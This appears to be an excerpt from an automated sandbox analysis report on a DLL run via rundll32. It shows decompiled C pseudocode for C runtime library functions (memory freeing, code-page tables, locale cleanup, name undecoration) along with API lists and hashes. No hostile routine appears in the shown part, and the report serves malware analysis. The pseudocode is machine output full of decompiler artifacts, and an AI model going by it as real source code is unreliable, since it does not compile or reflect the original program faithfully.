																					L58:
																					_t300 =  *0x1004e388; // 0x0
																					__eflags = _t300;
																					if(_t300 == 0) {
																						L82:
																						_t226 = _t225 | 0xffffffff;
																						__eflags = _t226;
																						L83:
																						E100268B3(_t288);
																						_t138 = _t226;
																						goto L84;
																					} else {
																						goto L59;
																					}
																				}
																			}
																		}
																	}
																}
															}
														} else {
															_t203 = E1002449E(__eflags);
															 *_t203 = 0x16;
															_t138 = _t203 | 0xffffffff;
															L84:
															return _t138;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t298 - _a4 - 1) = _t222;
														__eflags = E10031BEE(_v20 + 1 + _t298 - _a4, _t282, __eflags, _t298,  ~_v5 & _v20 + 0x00000001 + _t298 - _a4);
														if(__eflags == 0) {
															_t210 = E1002449E(__eflags);
															_t223 = _t222 | 0xffffffff;
															__eflags = _t223;
															 *_t210 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t222;
									if(_v5 != _t222) {
										 *0x1004e384 = E10026850(1, 4);
										E100268B3(_t222);
										_t317 = _t317 + 0xc;
										__eflags =  *0x1004e384 - _t222; // 0x31b4f0
										if(__eflags == 0) {
											L39:
											_t223 = _t222 | 0xffffffff;
											__eflags = _t223;
											goto L40;
										} else {
											__eflags =  *0x1004e388 - _t222; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x1004e388 = E10026850(1, 4);
												E100268B3(_t222);
												_t317 = _t317 + 0xc;
												__eflags =  *0x1004e388 - _t222; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t223 = 0;
										L40:
										E100268B3(_t286);
										_t119 = _t223;
										goto L41;
									}
								} else {
									__eflags =  *0x1004e388 - _t222; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L1001177D();
										if(__eflags == 0) {
											goto L38;
										} else {
											L120();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t221 = E1002449E(_t326);
					 *_t221 = 0x16;
					_t119 = _t221 | 0xffffffff;
					L41:
					return _t119;
				}
				L123:
			}

APIs

_free.LIBCMT ref: 10028F06
_free.LIBCMT ref: 10028F33

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 97635c0a49cb45435f50765eec424ad806435337378acb293feb1f8b4acd9554
Instruction ID: c9aa2e72dc3717b8aeb007e04fd68db8c0b5e47be17badfa8eb106a72592e22b
Opcode Fuzzy Hash: 97635c0a49cb45435f50765eec424ad806435337378acb293feb1f8b4acd9554
Instruction Fuzzy Hash: 91D15775D04355AFEB10EFB4AD85AAE77E4EF053D0F92426EF904D7281EB31AA008B54

Uniqueness

Uniqueness Score: -1.00%

Function 1002E7A1, Relevance: 22.9, APIs: 15, Instructions: 357
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1002E7A1(void* __edx, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				intOrPtr* _v52;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char* _v80;
				char* _v84;
				void* _v88;
				char _v92;
				void* __edi;
				void* __ebp;
				signed int _t126;
				char _t129;
				char _t147;
				signed short _t150;
				signed int _t151;
				void* _t153;
				void* _t156;
				void* _t159;
				void* _t160;
				void* _t164;
				signed int _t165;
				intOrPtr* _t166;
				signed char _t183;
				signed int* _t186;
				void* _t190;
				char _t195;
				signed char _t197;
				void* _t204;
				char _t205;
				void* _t207;
				signed int* _t209;
				void* _t212;
				intOrPtr _t217;
				short* _t221;
				intOrPtr _t222;
				signed int _t223;
				signed int _t230;
				char* _t231;
				intOrPtr _t232;
				signed char _t235;
				signed char* _t236;
				void* _t237;
				char* _t239;
				char* _t240;
				signed char* _t251;
				void* _t253;
				intOrPtr* _t254;
				intOrPtr* _t258;
				signed int _t259;
				short* _t260;
				signed int _t263;
				signed int _t264;
				void* _t265;
				void* _t266;

				_t233 = __edx;
				_t126 =  *0x1004d054; // 0x940b3682
				_v8 = _t126 ^ _t264;
				_t254 = _a4;
				_t205 = 0;
				_v56 = _t254;
				_t237 = 0;
				_v32 = 0;
				_t213 =  *((intOrPtr*)(_t254 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v92 = _t254;
				_v88 = 0;
				if( *((intOrPtr*)(_t254 + 0xa8)) == 0) {
					__eflags =  *((intOrPtr*)(_t254 + 0x8c));
					if( *((intOrPtr*)(_t254 + 0x8c)) != 0) {
						asm("lock dec dword [eax]");
					}
					 *((intOrPtr*)(_t254 + 0x8c)) = _t205;
					_t129 = 0;
					__eflags = 0;
					 *((intOrPtr*)(_t254 + 0x90)) = _t205;
					 *_t254 = 0x10044480;
					 *((intOrPtr*)(_t254 + 0x94)) = 0x10044700;
					 *((intOrPtr*)(_t254 + 0x98)) = 0x10044880;
					 *((intOrPtr*)(_t254 + 4)) = 1;
					L48:
					return E100037EA(_t129, _v8 ^ _t264, _t233);
				}
				_t131 = _t254 + 8;
				_v52 = 0;
				if( *(_t254 + 8) != 0) {
					L3:
					_v52 = E10026850(1, 4);
					E100268B3(_t205);
					_v32 = E10026850(0x180, 2);
					E100268B3(_t205);
					_t237 = E10026850(0x180, 1);
					_v44 = _t237;
					E100268B3(_t205);
					_v36 = E10026850(0x180, 1);
					E100268B3(_t205);
					_v40 = E10026850(0x101, 1);
					E100268B3(_t205);
					_t266 = _t265 + 0x3c;
					if(_v52 == _t205 || _v32 == _t205) {
						L43:
						E100268B3(_v52);
						E100268B3(_v32);
						E100268B3(_t237);
						E100268B3(_v36);
						_t205 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t217 = _v40;
						if(_t217 == 0 || _t237 == 0 || _v36 == _t205) {
							goto L43;
						} else {
							_t147 = _t205;
							do {
								 *((char*)(_t147 + _t217)) = _t147;
								_t147 = _t147 + 1;
							} while (_t147 < 0x100);
							if(GetCPInfo( *(_t254 + 8),  &_v28) == 0) {
								goto L43;
							}
							_t150 = _v28;
							if(_t150 > 5) {
								goto L43;
							}
							_t151 = _t150 & 0x0000ffff;
							_v60 = _t151;
							if(_t151 <= 1) {
								L22:
								_t37 = _t237 + 0x81; // 0x81
								_t233 = 0xff;
								_v48 = _v40 + 1;
								_t153 = E100318A5(_t284, _t205,  *((intOrPtr*)(_t254 + 0xa8)), 0x100, _v40 + 1, 0xff, _t37, 0xff,  *(_t254 + 8), _t205);
								_t266 = _t266 + 0x24;
								_t285 = _t153;
								if(_t153 == 0) {
									goto L43;
								}
								_t156 = E100318A5(_t285, _t205,  *((intOrPtr*)(_t254 + 0xa8)), 0x200, _v48, 0xff, _v36 + 0x81, 0xff,  *(_t254 + 8), _t205);
								_t266 = _t266 + 0x24;
								_t286 = _t156;
								if(_t156 == 0) {
									goto L43;
								}
								_v72 = _v32 + 0x100;
								_t159 = E1002E537(0xff, _t286, _t205, 1, _v40, 0x100, _v32 + 0x100,  *(_t254 + 8), _t205);
								_t266 = _t266 + 0x1c;
								if(_t159 == 0) {
									goto L43;
								}
								_t160 = _v32;
								_t221 = _t160 + 0xfe;
								 *_t221 = 0;
								_t233 = _v44;
								_v76 = _t221;
								_t222 = _v36;
								_t239 = _t233 + 0x80;
								 *((char*)(_t233 + 0x7f)) = _t205;
								_v80 = _t239;
								 *((char*)(_t222 + 0x7f)) = _t205;
								 *_t239 = _t205;
								_t240 = _t222 + 0x80;
								_v84 = _t240;
								 *_t240 = _t205;
								if(_v60 <= 1) {
									L39:
									_t223 = 0x3f;
									_push(0x1f);
									memcpy(_v32, _v32 + 0x200, _t223 << 2);
									_push(0x1f);
									asm("movsw");
									_t164 = memcpy(_t233, _t233 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t165 = memcpy(_t164, _t164 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t258 = _v56;
									if( *((intOrPtr*)(_t258 + 0x8c)) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t165 | 0xffffffff) == 0) {
											E100268B3( *((intOrPtr*)(_t258 + 0x90)) - 0xfe);
											E100268B3( *((intOrPtr*)(_t258 + 0x94)) - 0x80);
											E100268B3( *((intOrPtr*)(_t258 + 0x98)) - 0x80);
											E100268B3( *((intOrPtr*)(_t258 + 0x8c)));
										}
									}
									_t166 = _v52;
									 *_t166 = 1;
									 *((intOrPtr*)(_t258 + 0x8c)) = _t166;
									 *_t258 = _v72;
									 *((intOrPtr*)(_t258 + 0x90)) = _v76;
									 *((intOrPtr*)(_t258 + 0x94)) = _v80;
									 *((intOrPtr*)(_t258 + 0x98)) = _v84;
									 *(_t258 + 4) = _v60;
									L44:
									E100268B3(_v40);
									_t129 = _t205;
									goto L48;
								}
								if( *(_t254 + 8) != 0xfde9) {
									_t251 =  &_v22;
									__eflags = _v22 - _t205;
									if(_v22 == _t205) {
										goto L39;
									}
									_t207 = _v32;
									while(1) {
										_t183 = _t251[1];
										__eflags = _t183;
										if(_t183 == 0) {
											break;
										}
										_t259 =  *_t251 & 0x000000ff;
										_v64 = _t259;
										__eflags = _t259 - (_t183 & 0x000000ff);
										if(_t259 > (_t183 & 0x000000ff)) {
											L37:
											_t251 =  &(_t251[2]);
											__eflags =  *_t251;
											if( *_t251 != 0) {
												continue;
											}
											break;
										}
										_v48 = _t233;
										_t186 = _t222 + 0x80 + _t259;
										_t235 = _t233 - _t222;
										__eflags = _t235;
										_t230 = _v64;
										_t260 = _t207 - 0xffffff00 + _t259 * 2;
										_v68 = _t186;
										_t209 = _t186;
										do {
											 *_t260 = 0x8000;
											_t260 = _t260 + 2;
											 *(_t235 + _t209) = _t230;
											 *_t209 = _t230;
											_t230 = _t230 + 1;
											_t209 =  &(_t209[0]);
											__eflags = _t230 - (_t251[1] & 0x000000ff);
										} while (_t230 <= (_t251[1] & 0x000000ff));
										_t233 = _v44;
										_t222 = _v36;
										_t207 = _v32;
										goto L37;
									}
									L38:
									_t205 = 0;
									goto L39;
								}
								_v44 = _t160 + 0x200;
								_t231 = _t233 + 0x100;
								_t253 = _t222 - _t233;
								_t190 = 0xffffff80;
								_v48 = _t190 - _t233;
								do {
									_push(0x32);
									asm("sbb eax, eax");
									_v44 = _v44 + 2;
									 *_v44 = (0xfffffebe + _t231 & 0xffff8000) + 0x8000;
									_t212 = _v48;
									_t195 = _t231 + _t212;
									 *_t231 = _t195;
									 *((char*)(_t253 + _t231)) = _t195;
									_t231 = _t231 + 1;
								} while (_t212 + _t231 <= 0xff);
								goto L38;
							}
							_t284 =  *(_t254 + 8) - 0xfde9;
							if( *(_t254 + 8) != 0xfde9) {
								_t236 =  &_v22;
								__eflags = _v22 - _t205;
								if(__eflags == 0) {
									goto L22;
								}
								_t232 = _v40;
								while(1) {
									_t197 = _t236[1];
									__eflags = _t197;
									if(__eflags == 0) {
										break;
									}
									_t263 =  *_t236 & 0x000000ff;
									__eflags = _t263 - (_t197 & 0x000000ff);
									if(_t263 > (_t197 & 0x000000ff)) {
										L20:
										_t236 =  &(_t236[2]);
										__eflags =  *_t236 - _t205;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t263 + _t232)) = 0x20;
										_t263 = _t263 + 1;
										__eflags = _t263 - (_t236[1] & 0x000000ff);
									} while (_t263 <= (_t236[1] & 0x000000ff));
									goto L20;
								}
								_t254 = _v56;
								goto L22;
							}
							E100050F0(_t237, _v40 - 0xffffff80, 0x20, 0x80);
							_t266 = _t266 + 0xc;
							goto L22;
						}
					}
				}
				_t204 = E10037D5C(__edx,  &_v92, 0, _t213, 0x1004, _t131);
				_t266 = _t265 + 0x14;
				if(_t204 != 0) {
					goto L43;
				}
				goto L3;
			}

APIs

_free.LIBCMT ref: 1002E810
_free.LIBCMT ref: 1002E826
_free.LIBCMT ref: 1002E839
_free.LIBCMT ref: 1002E84E
_free.LIBCMT ref: 1002E863
GetCPInfo.KERNEL32(?,?), ref: 1002E8AD

Part of subcall function 10037D5C: _free.LIBCMT ref: 10037DC7

_free.LIBCMT ref: 1002EB18
_free.LIBCMT ref: 1002EB2B
_free.LIBCMT ref: 1002EB39
_free.LIBCMT ref: 1002EB44
_free.LIBCMT ref: 1002EB86
_free.LIBCMT ref: 1002EB8E
_free.LIBCMT ref: 1002EB94
_free.LIBCMT ref: 1002EB9C
_free.LIBCMT ref: 1002EBAA

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: f7ec84a5157e58a8a6bc663e412cef8f61bcd6c2dbe3a2a6ff2e487cbc6986f7
Instruction ID: a43070e0b0711e41ad9a0cb5ae2b548a2436ceb787582ea256af61a5ca8909b4
Opcode Fuzzy Hash: f7ec84a5157e58a8a6bc663e412cef8f61bcd6c2dbe3a2a6ff2e487cbc6986f7
Instruction Fuzzy Hash: 7CD19E75D002859FDB11CFA4D881BEEBBF5FF08300F944169E995A7282DB71AD458B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000B7FB, Relevance: 19.8, APIs: 13, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E1000B7FB(void* __edx, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				char _v76;
				char _v84;
				char _v92;
				char _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v148;
				char _v156;
				char _v164;
				char _v172;
				char _v180;
				char _v188;
				char _v196;
				char _v204;
				char _v212;
				char _v220;
				char _v228;
				char _v236;
				char _v244;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t90;
				intOrPtr _t91;
				intOrPtr* _t92;
				intOrPtr _t93;
				signed int* _t96;
				char* _t99;
				void* _t101;
				signed int* _t102;
				void* _t106;
				void* _t109;
				void* _t118;
				void* _t122;
				void* _t125;
				char* _t129;
				void* _t131;
				void* _t132;
				void* _t135;
				char* _t141;
				void* _t144;
				signed int* _t153;
				signed int _t164;
				char* _t174;
				signed int* _t176;
				char* _t177;
				intOrPtr* _t182;
				signed int* _t186;
				signed int* _t191;
				signed int _t196;
				signed int* _t199;
				void* _t203;
				signed int _t204;
				signed int* _t206;
				void* _t207;

				_t203 = __edx;
				_t206 = _a4;
				 *_t206 =  *_t206 & 0x00000000;
				_t206[1] = _t206[1] & 0x00000000;
				_t164 = 0;
				while(1) {
					_t90 =  *0x1004e004; // 0x0
					_t91 =  *_t90;
					if(_t91 == 0 || _t91 == 0x40) {
						break;
					}
					if( *0x1004e010 == 0 ||  *0x1004e011 != 0) {
						if( *_t206 != 0) {
							_v44 = "::";
							_v40 = 2;
							_t185 = E1000723E( &_v108,  &_v44);
							E100076A6(_t156,  &_v52, _t206);
							 *_t206 = _v52;
							_t206[1] = _v48;
							if(_t164 != 0) {
								_t186 = E10007637(_t185,  &_v116, 0x5b, _t206);
								_t207 = _t207 + 0xc;
								_t164 = 0;
								 *_t206 =  *_t186;
								_t206[1] = _t186[1];
							}
						}
						_t99 =  *0x1004e004; // 0x0
						if( *_t99 != 0x3f) {
							_t101 = E1000CF24(_t203,  &_v92, 1, 0);
							_t174 =  &_v100;
							L36:
							_t207 = _t207 + 0xc;
							L37:
							_t102 = E100076A6(_t101, _t174, _t206);
							L38:
							_t176 = _t102;
							 *_t206 =  *_t176;
							_t206[1] = _t176[1];
							L39:
							if(_t206[1] == 0) {
								continue;
							}
							break;
						}
						_t15 = _t99 + 1; // 0x1
						_t177 = _t15;
						 *0x1004e004 = _t177;
						_t106 =  *_t177 - 0x24;
						if(_t106 == 0) {
							_t71 = _t177 - 1; // 0x0
							 *0x1004e004 = _t71;
							_t101 = E1000CF24(_t203,  &_v244, 1, 0);
							_t174 =  &_v84;
							goto L36;
						}
						_t109 = _t106 - 1;
						if(_t109 == 0) {
							L32:
							E100071BE( &_v76, 0x1004e004, 0x40);
							_v68 = "`anonymous namespace\'";
							_v64 = 0x15;
							E100076A6(E1000723E( &_v236,  &_v68),  &_v20, _t206);
							 *_t206 = _v20;
							_t206[1] = _v16;
							_t182 =  *0x1004dffc; // 0x0
							__eflags =  *_t182 - 9;
							if(__eflags != 0) {
								E100078F0(_t182,  &_v76);
							}
							goto L39;
						}
						_t118 = _t109 - 0x1a;
						if(_t118 == 0) {
							__eflags =  *((char*)(_t177 + 1)) - 0x5f;
							if(__eflags != 0) {
								L31:
								_push( &_v204);
								_t122 = E10007637(_t177,  &_v212, 0x60, L10009B9E(_t164, _t177, _t203, _t204, _t206, __eflags));
								_t207 = _t207 + 0x10;
								_t101 = E100076C8(_t122,  &_v220, 0x27);
								_t174 =  &_v228;
								goto L37;
							}
							__eflags =  *((char*)(_t177 + 2)) - 0x3f;
							if(__eflags != 0) {
								goto L31;
							}
							_t52 = _t177 + 1; // 0x2
							 *0x1004e004 = _t52;
							_t125 = E1000AB0E(_t203,  &_v188, 0, 0);
							_t207 = _t207 + 0xc;
							_t191 = E100076A6(_t125,  &_v196, _t206);
							 *_t206 =  *_t191;
							_t206[1] = _t191[1];
							_t129 =  *0x1004e004; // 0x0
							__eflags =  *_t129 - 0x40;
							if(__eflags != 0) {
								goto L39;
							}
							L30:
							 *0x1004e004 =  *0x1004e004 + 1;
							goto L39;
						}
						_t131 = _t118;
						if(_t131 == 0) {
							goto L32;
						}
						_t132 = _t131 - 8;
						if(_t132 == 0) {
							_t46 = _t177 + 1; // 0x2
							 *0x1004e004 = _t46;
							_t135 = E1000CF24(_t203,  &_v164, 1, 0);
							_t207 = _t207 + 0xc;
							_t102 = E100076A6(E100076C8(_t135,  &_v172, 0x5d),  &_v180, _t206);
							_t164 = 1;
							goto L38;
						}
						_t222 = _t132 == 8;
						if(_t132 == 8) {
							_t18 = _t177 + 1; // 0x2
							_t19 =  &_v8;
							 *_t19 = _v8 & 0;
							__eflags =  *_t19;
							_v12 = 0;
							 *0x1004e004 = _t18;
							while(1) {
								E1000CF24(_t203,  &_v36, 1, 0);
								_t196 = _v32;
								_t207 = _t207 + 0xc;
								__eflags = _t196;
								if(_t196 != 0) {
									_t196 = 2;
									_t204 = 0;
									__eflags = 0;
								} else {
									__eflags = _t204;
									if(_t204 == 0) {
										_t204 = _v36;
									} else {
										_v28 = _v36;
										_v24 = _t196;
										_v60 = "::";
										_v56 = 2;
										E10007748( &_v28,  &_v60);
										_t153 = E100076A6( &_v28,  &_v140,  &_v12);
										_t204 =  *_t153;
										_t196 = _t153[1];
									}
								}
								_v8 = _t196;
								_v12 = _t204;
								__eflags = _t196;
								if(__eflags != 0) {
									break;
								}
								_t141 =  *0x1004e004; // 0x0
								__eflags =  *_t141 - 0x40;
								if( *_t141 != 0x40) {
									continue;
								}
								_t144 = E10007637(_t196,  &_v148, 0x5b,  &_v12);
								_t207 = _t207 + 0xc;
								_t199 = E100076C8(_t144,  &_v156, 0x5d);
								 *_t206 =  *_t199;
								_t206[1] = _t199[1];
								goto L30;
							}
							_t206[1] = _t206[1] & 0x00000000;
							 *_t206 =  *_t206 & 0x00000000;
							_t206[1] = 2;
							goto L39;
						} else {
							_t101 = E1000A99E(_t177, _t203, _t222,  &_v124);
							_t174 =  &_v132;
							goto L37;
						}
					} else {
						L46:
						return _t206;
					}
				}
				_t92 =  *0x1004e004; // 0x0
				_t93 =  *_t92;
				if(_t93 == 0) {
					__eflags =  *_t206;
					_push(1);
					if( *_t206 != 0) {
						_v20 = "::";
						_v16 = 2;
						_t96 = E100076A6(E10007684(E100072DE( &_v100),  &_v92,  &_v20),  &_v84, _t206);
						 *_t206 =  *_t96;
						_t206[1] = _t96[1];
					} else {
						E10007596(_t206);
					}
				} else {
					if(_t93 != 0x40) {
						_t206[1] = _t206[1] & 0x00000000;
						 *_t206 =  *_t206 & 0x00000000;
						_t206[1] = 2;
					}
				}
				goto L46;
			}

APIs

DName::operator+.LIBCMT ref: 1000B866
DName::operator+.LIBCMT ref: 1000B99C

Part of subcall function 10007748: shared_ptr.LIBCMT ref: 10007764

DName::operator+.LIBCMT ref: 1000B9E8
DName::operator+.LIBCMT ref: 1000B9F7
DName::operator+.LIBCMT ref: 1000B952

Part of subcall function 1000CF24: DName::operator=.LIBVCRUNTIME ref: 1000CFB3

DName::operator+.LIBCMT ref: 1000BB24
DName::operator=.LIBVCRUNTIME ref: 1000BB64
DName::DName.LIBVCRUNTIME ref: 1000BB7C
DName::operator+.LIBCMT ref: 1000BB8B
DName::operator+.LIBCMT ref: 1000BB97

Part of subcall function 1000CF24: Replicator::operator[].LIBVCRUNTIME ref: 1000CF61

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
String ID:
API String ID: 1026175760-0
Opcode ID: 31b5ecf051329b541345bd7913f4edbac89e0eeeccac291c9b78518f8dea3edb
Instruction ID: 865cfd34c394bda65aa44f7df4ae2116b870d9faa91fa5b2e98e0a47c1a3d343
Opcode Fuzzy Hash: 31b5ecf051329b541345bd7913f4edbac89e0eeeccac291c9b78518f8dea3edb
Instruction Fuzzy Hash: 9AC1BF71D006489FEB20CFA4C985FEEBBF8EB05380F10445DE14AE7289EB75AA44CB55

Uniqueness

Uniqueness Score: -1.00%

Function 1002E173, Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1002E173(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x1004d788) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E100268B3(_t46);
							E1002EC4B( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E100268B3(_t47);
							E1002F136( *((intOrPtr*)(_t74 + 0x88)));
						}
						E100268B3( *((intOrPtr*)(_t74 + 0x7c)));
						E100268B3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E100268B3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E100268B3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E100268B3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E100268B3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E1002E2E4( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x1004d178) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E100268B3(_t31);
							E100268B3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E100268B3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E100268B3(_t74);
			}

APIs

___free_lconv_mon.LIBCMT ref: 1002E1B7

Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002EC68
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002EC7A
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002EC8C
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002EC9E
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECB0
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECC2
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECD4
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECE6
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECF8
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ED0A
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ED1C
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ED2E
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ED40

_free.LIBCMT ref: 1002E1AC

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 1002E1CE
_free.LIBCMT ref: 1002E1E3
_free.LIBCMT ref: 1002E1EE
_free.LIBCMT ref: 1002E210
_free.LIBCMT ref: 1002E223
_free.LIBCMT ref: 1002E231
_free.LIBCMT ref: 1002E23C
_free.LIBCMT ref: 1002E274
_free.LIBCMT ref: 1002E27B
_free.LIBCMT ref: 1002E298
_free.LIBCMT ref: 1002E2B0

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 44666f3e792033bf78c52a5bc1681bd2bdcfbab39e3579f54de7d788c7dc3adf
Instruction ID: b2064f8893aa3c5965b5dc156e633d10c076f5acde63b25f045ac74ecc00f496
Opcode Fuzzy Hash: 44666f3e792033bf78c52a5bc1681bd2bdcfbab39e3579f54de7d788c7dc3adf
Instruction Fuzzy Hash: DA315A31A40381DFEB20DAB8FD41B4A73E9EF04394FA14529F85AD6291DE30BD548B60

Uniqueness

Uniqueness Score: -1.00%

Function 1002ED49, Relevance: 18.4, APIs: 12, Instructions: 373
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E1002ED49(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				signed int _t106;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t126;
				signed int _t130;
				signed int _t134;
				signed int _t138;
				signed int _t142;
				signed int _t146;
				signed int _t150;
				signed int _t154;
				signed int _t158;
				signed int _t162;
				signed int _t166;
				signed int _t170;
				signed int _t174;
				signed int _t178;
				signed int _t182;
				signed int _t186;
				signed int _t190;
				char _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				void* _t225;
				char* _t227;
				signed int _t228;
				signed int _t232;
				signed int _t233;
				void* _t235;
				void* _t237;
				char* _t258;

				_t225 = __edx;
				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t235 = E10026850(1, 0x50);
					_v8 = _t235;
					E100268B3(0);
					if(_t235 != 0) {
						_t228 = E10026850(1, 4);
						_v12 = _t228;
						E100268B3(0);
						if(_t228 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
